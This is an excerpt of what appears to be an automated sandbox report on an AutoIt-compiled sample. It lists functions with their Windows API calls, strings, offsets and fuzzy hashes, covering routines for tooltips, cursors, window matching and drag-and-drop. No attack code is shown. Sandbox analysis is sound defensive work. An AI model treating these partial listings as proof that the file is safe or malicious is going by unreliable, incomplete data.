API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 8b4e8f283304be39ff290002e146e1204bf430b22878747a0722076895fad08d
Instruction ID: a17d441bae4a8479892395a6df09385f46b97ca2ca52d0c9263065eaa3278e79
Opcode Fuzzy Hash: 8b4e8f283304be39ff290002e146e1204bf430b22878747a0722076895fad08d
Instruction Fuzzy Hash: C4E18571900209AFDF60DF65CC84EEE7BB9FF09710F00819AFA95AA195D7798684CF50

Function 0101488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 010149CA
GetDesktopWindow.USER32 ref: 010149DF
GetWindowRect.USER32(00000000), ref: 010149E6
GetWindowLongW.USER32(?,000000F0), ref: 01014A48
DestroyWindow.USER32(?), ref: 01014A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 01014A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01014ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 01014AE1
SendMessageW.USER32(?,00000421,?,?), ref: 01014AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01014B09
IsWindowVisible.USER32(?), ref: 01014B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01014B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01014B58
GetWindowRect.USER32(?,?), ref: 01014B70
MonitorFromPoint.USER32(?,?,00000002), ref: 01014B96
GetMonitorInfoW.USER32(00000000,?), ref: 01014BB0
CopyRect.USER32(?,?), ref: 01014BC7
SendMessageW.USER32(?,00000412,00000000), ref: 01014C32

Strings

(, xrefs: 01014BA3
tooltips_class32, xrefs: 01014A96
0, xrefs: 01014975

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 866082fb5119af64a3f8aa38335c1e9ca70e92ea8da20f19bbce22d8a5225d4f
Instruction ID: f2fec4cf5145c9c611ba290f2a13bdc9afa6ed124335136a0fdbde704f6e59f7
Opcode Fuzzy Hash: 866082fb5119af64a3f8aa38335c1e9ca70e92ea8da20f19bbce22d8a5225d4f
Instruction Fuzzy Hash: 98B1AB71608341AFDB44DF68C885B6ABBE4BF88314F00891CF9D99B2A1D779E805CB95

Function 00FF449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00FF44AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00FF44D2
_wcscpy.LIBCMT ref: 00FF4500
_wcscmp.LIBCMT ref: 00FF450B
_wcscat.LIBCMT ref: 00FF4521
_wcsstr.LIBCMT ref: 00FF452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00FF4548
_wcscat.LIBCMT ref: 00FF4591
_wcscat.LIBCMT ref: 00FF4598
_wcsncpy.LIBCMT ref: 00FF45C3

Strings

DefaultLangCodepage, xrefs: 00FF45AB
%u.%u.%u.%u, xrefs: 00FF4626
StringFileInfo\, xrefs: 00FF451B
\VarFileInfo\Translation, xrefs: 00FF4540
04090000, xrefs: 00FF457E

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 3285c40ff07382f9f011d77db6f0318043e9e29bc47acde8d8e73ce561eb5add
Instruction ID: cb63ff652bc76634805c878af90633e9b16607f0ff01f22580ecb10bd133f983
Opcode Fuzzy Hash: 3285c40ff07382f9f011d77db6f0318043e9e29bc47acde8d8e73ce561eb5add
Instruction Fuzzy Hash: D84138729402057BDB10BA72CC47EFF776CDF46710F04055AFA04EA192EA3CAA01AAB5

Function 00F927D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F928BC
GetSystemMetrics.USER32(00000007), ref: 00F928C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F928EF
GetSystemMetrics.USER32(00000008), ref: 00F928F7
GetSystemMetrics.USER32(00000004), ref: 00F9291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F92939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F92949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F9297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F92990
GetClientRect.USER32(00000000,000000FF), ref: 00F929AE
GetStockObject.GDI32(00000011), ref: 00F929CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00F929D5

Part of subcall function 00F92344: GetCursorPos.USER32(?), ref: 00F92357
Part of subcall function 00F92344: ScreenToClient.USER32(010557B0,?), ref: 00F92374
Part of subcall function 00F92344: GetAsyncKeyState.USER32(00000001), ref: 00F92399
Part of subcall function 00F92344: GetAsyncKeyState.USER32(00000002), ref: 00F923A7

SetTimer.USER32(00000000,00000000,00000028,00F91256), ref: 00F929FC

Strings

AutoIt v3 GUI, xrefs: 00F92974

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 9b05b45712c41ad0fabcfa6d9ceb0369e2af0186801597ecdb38f83bac5e2d84
Instruction ID: 465e7416a99e1279b736efe122b21a77873b4263dd35a71b560c9113d1616d24
Opcode Fuzzy Hash: 9b05b45712c41ad0fabcfa6d9ceb0369e2af0186801597ecdb38f83bac5e2d84
Instruction Fuzzy Hash: E1B16F71A0020AEFEF24DFA8DD45BAE7BB4FB08310F104129FA55E7294DB79A841DB50

Function 00FEA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00FEA47A
__swprintf.LIBCMT ref: 00FEA51B
_wcscmp.LIBCMT ref: 00FEA52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00FEA583
_wcscmp.LIBCMT ref: 00FEA5BF
GetClassNameW.USER32(?,?,00000400), ref: 00FEA5F6
GetDlgCtrlID.USER32(?), ref: 00FEA648
GetWindowRect.USER32(?,?), ref: 00FEA67E
GetParent.USER32(?), ref: 00FEA69C
ScreenToClient.USER32(00000000), ref: 00FEA6A3
GetClassNameW.USER32(?,?,00000100), ref: 00FEA71D
_wcscmp.LIBCMT ref: 00FEA731
GetWindowTextW.USER32(?,?,00000400), ref: 00FEA757
_wcscmp.LIBCMT ref: 00FEA76B

Part of subcall function 00FB362C: _iswctype.LIBCMT ref: 00FB3634

Strings

%s%u, xrefs: 00FEA515

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: fc00612b7f331bb8002862e5f5a16c749a1a1767aeaa41aadec8ae5cfea279c7
Instruction ID: 8e132dcc4e64766b30ce99746a1f7c7f98349949f10dc46495cf9427aa73b52e
Opcode Fuzzy Hash: fc00612b7f331bb8002862e5f5a16c749a1a1767aeaa41aadec8ae5cfea279c7
Instruction Fuzzy Hash: FAA1E131604746AFD714DF62C884FAAB7E8FF44324F048629F999C2190EB34F959DB92

Function 00FEAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00FEAF18
_wcscmp.LIBCMT ref: 00FEAF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 00FEAF51
CharUpperBuffW.USER32(?,00000000), ref: 00FEAF6E
_wcscmp.LIBCMT ref: 00FEAF8C
_wcsstr.LIBCMT ref: 00FEAF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00FEAFD5
_wcscmp.LIBCMT ref: 00FEAFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 00FEB00C
GetClassNameW.USER32(00000018,?,00000400), ref: 00FEB055
_wcscmp.LIBCMT ref: 00FEB065
GetClassNameW.USER32(00000010,?,00000400), ref: 00FEB08D
GetWindowRect.USER32(00000004,?), ref: 00FEB0F6

Strings

@, xrefs: 00FEAEF9
ThumbnailClass, xrefs: 00FEAFE0, 00FEB060

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 59964402bdbcf5396efe697d64dd9a1f6d127b997a4336abacdec1220c625f9a
Instruction ID: 6a30f98acd3d7cce7fbd22db97960ab4b3df9cf1b559017a0a1b00b9dc42385f
Opcode Fuzzy Hash: 59964402bdbcf5396efe697d64dd9a1f6d127b997a4336abacdec1220c625f9a
Instruction Fuzzy Hash: 9181B2715083869FDB11DF12C885BAB77D8EF44324F04846AFD858A095DB38ED49DBA2

Function 00FEABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00FEAC33

Strings

[ALL, xrefs: 00FEACD9
HANDLE=, xrefs: 00FEAC2C
LAST, xrefs: 00FEABF8
REGEXP=, xrefs: 00FEAC48
[CLASS:, xrefs: 00FEAC83
[HANDLE:, xrefs: 00FEAC3F
ALL, xrefs: 00FEACC7
[LAST, xrefs: 00FEACE0
CLASSNAME=, xrefs: 00FEAC70
[ACTIVE, xrefs: 00FEAC20
[REGEXPTITLE:, xrefs: 00FEAC5B
ACTIVE, xrefs: 00FEAC0E

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 54e925ff118648d462c0ae90683d8aa3a84b7a88178d3cce791735ce3bebb6e3
Instruction ID: 74b53f3e82ffb34ee0e874b5785eb3dd5cb781631d29b3be91727654f7b6a060
Opcode Fuzzy Hash: 54e925ff118648d462c0ae90683d8aa3a84b7a88178d3cce791735ce3bebb6e3
Instruction Fuzzy Hash: 7C31E371944349ABEB10FAA6DD83EFE7764AF50720F700428F442750D1EF55AF14EA52

Function 01004FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 01005013
LoadCursorW.USER32(00000000,00007F00), ref: 0100501E
LoadCursorW.USER32(00000000,00007F03), ref: 01005029
LoadCursorW.USER32(00000000,00007F8B), ref: 01005034
LoadCursorW.USER32(00000000,00007F01), ref: 0100503F
LoadCursorW.USER32(00000000,00007F81), ref: 0100504A
LoadCursorW.USER32(00000000,00007F88), ref: 01005055
LoadCursorW.USER32(00000000,00007F80), ref: 01005060
LoadCursorW.USER32(00000000,00007F86), ref: 0100506B
LoadCursorW.USER32(00000000,00007F83), ref: 01005076
LoadCursorW.USER32(00000000,00007F85), ref: 01005081
LoadCursorW.USER32(00000000,00007F82), ref: 0100508C
LoadCursorW.USER32(00000000,00007F84), ref: 01005097
LoadCursorW.USER32(00000000,00007F04), ref: 010050A2
LoadCursorW.USER32(00000000,00007F02), ref: 010050AD
LoadCursorW.USER32(00000000,00007F89), ref: 010050B8
GetCursorInfo.USER32(?), ref: 010050C8

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 5d79493e5cb86076edf87a27550d86d9ca2ee6b47fe98daea1f314f9ef0b22e3
Instruction ID: 37912ea06b63cd42eb38e66964c429ec41f02521a3b0e48d1f822cd8d60a8b95
Opcode Fuzzy Hash: 5d79493e5cb86076edf87a27550d86d9ca2ee6b47fe98daea1f314f9ef0b22e3
Instruction Fuzzy Hash: 863117B1D483196AEF509FBA8C8989EBFE8FF04750F50452AA54CE7280DA7865008F91

Function 0101A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0101A259
DestroyWindow.USER32(?,?), ref: 0101A2D3

Part of subcall function 00F97BCC: _memmove.LIBCMT ref: 00F97C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0101A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0101A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0101A382
DestroyWindow.USER32(00000000), ref: 0101A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F90000,00000000), ref: 0101A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0101A3F4
GetDesktopWindow.USER32 ref: 0101A40D
GetWindowRect.USER32(00000000), ref: 0101A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0101A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0101A444

Part of subcall function 00F925DB: GetWindowLongW.USER32(?,000000EB), ref: 00F925EC

Strings

0, xrefs: 0101A26F
tooltips_class32, xrefs: 0101A346, 0101A3D4

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 7a7f0a3691c0f29a9a1cecaf97286ab77b28525df087654316549bbf57ef7d5f
Instruction ID: 084d468fbc09508c46b519a0298891009bf4f2d0f39d40ace53a6581454bbf6f
Opcode Fuzzy Hash: 7a7f0a3691c0f29a9a1cecaf97286ab77b28525df087654316549bbf57ef7d5f
Instruction Fuzzy Hash: C3718A70240345AFEB21CF28CC49F6A7BE5FB88304F04495CF9C59B2A4DB79A906CB52

Function 0101C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F92612: GetWindowLongW.USER32(?,000000EB), ref: 00F92623

DragQueryPoint.SHELL32(?,?), ref: 0101C627

Part of subcall function 0101AB37: ClientToScreen.USER32(?,?), ref: 0101AB60
Part of subcall function 0101AB37: GetWindowRect.USER32(?,?), ref: 0101ABD6
Part of subcall function 0101AB37: PtInRect.USER32(?,?,0101C014), ref: 0101ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 0101C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0101C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0101C6BE
_wcscat.LIBCMT ref: 0101C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0101C705
SendMessageW.USER32(?,000000B0,?,?), ref: 0101C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 0101C735
SendMessageW.USER32(?,000000B1,?,?), ref: 0101C757
DragFinish.SHELL32(?), ref: 0101C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0101C851

Strings

@GUI_DROPID, xrefs: 0101C77E
@GUI_DRAGFILE, xrefs: 0101C800
@GUI_DRAGID, xrefs: 0101C7C9

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 41d80680c92bcdc078e14e7e34a67a6b66f2d7bf1d6b99c8a8d51617274e1f58
Instruction ID: dac99248f85a282a6bb8bb23612236cac6a52e1b7e0d1b71f688a1a5ad2003b7
Opcode Fuzzy Hash: 41d80680c92bcdc078e14e7e34a67a6b66f2d7bf1d6b99c8a8d51617274e1f58
Instruction Fuzzy Hash: 39617A71108301AFDB11EF64DC85DAFBBE8FF89750F00091EF691961A1DB79AA09CB52

Function 01014392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 01014424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0101446F

Strings

EXISTS, xrefs: 010144D8
GETSELECTED, xrefs: 0101457F
GETTOTALCOUNT, xrefs: 01014456
GETITEMCOUNT, xrefs: 01014551
GETTEXT, xrefs: 010145C2
CHECK, xrefs: 0101448F
SELECT, xrefs: 01014620
UNCHECK, xrefs: 0101464B
COLLAPSE, xrefs: 010144B5
ISCHECKED, xrefs: 010145F2
EXPAND, xrefs: 01014521

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 60924e45f84060fa03d14a35196c0e0b3ccd5a46eb14fa0a6fb06b191d27180b
Instruction ID: 179259aeea1bb0752ac25d442e4b7fa3f369453bb5a31bfbab701641a6fc5baa
Opcode Fuzzy Hash: 60924e45f84060fa03d14a35196c0e0b3ccd5a46eb14fa0a6fb06b191d27180b
Instruction Fuzzy Hash: 4E918C702043018BDB04EF24C851A6EB7E5BF98354F45486CE8D69B3A2DB78ED09DB91

Function 0101B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0101B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,010191C2), ref: 0101B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0101B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0101B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0101B9C3
FreeLibrary.KERNEL32(?), ref: 0101B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0101B9DF
DestroyIcon.USER32(?,?,?,?,?,010191C2), ref: 0101B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0101BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0101BA17

Part of subcall function 00FB2EFD: __wcsicmp_l.LIBCMT ref: 00FB2F86

Strings

.dll, xrefs: 0101B86D
.exe, xrefs: 0101B84A
.icl, xrefs: 0101B82A

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 98d9550bcf6875f10550191997bc234dd4cc30af5f0ad4fa2968cd6120ecdf7b
Instruction ID: f61bf348c9626e38e260d19d8060df0469d0dc74472e0f7ccbaae22de5c915dc
Opcode Fuzzy Hash: 98d9550bcf6875f10550191997bc234dd4cc30af5f0ad4fa2968cd6120ecdf7b
Instruction Fuzzy Hash: F561CC71900219BAEB24DF69CC41BBE7BB8FB08B10F104259FD55D61C1DB7D9A81DBA0

Function 00FFA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

CharLowerBuffW.USER32(?,?), ref: 00FFA3CB
GetDriveTypeW.KERNEL32 ref: 00FFA418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FFA460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FFA497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FFA4C5

Part of subcall function 00F97BCC: _memmove.LIBCMT ref: 00F97C06

Strings

open, xrefs: 00FFA3F2
wait, xrefs: 00FFA482
type cdaudio alias cd wait, xrefs: 00FFA443
close cd wait, xrefs: 00FFA4B0
close, xrefs: 00FFA3D1
set cd door , xrefs: 00FFA466
closed, xrefs: 00FFA3DF, 00FFA3E8
open , xrefs: 00FFA427

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 571e007c6ee144a6dcba55d209f6b101e6dbcc9944aef798e7794ea9f9a8f871
Instruction ID: 91115ab4c283e53778358fc9a9b397c573232e2e2a0c6c3e8edc6b87d49f509c
Opcode Fuzzy Hash: 571e007c6ee144a6dcba55d209f6b101e6dbcc9944aef798e7794ea9f9a8f871
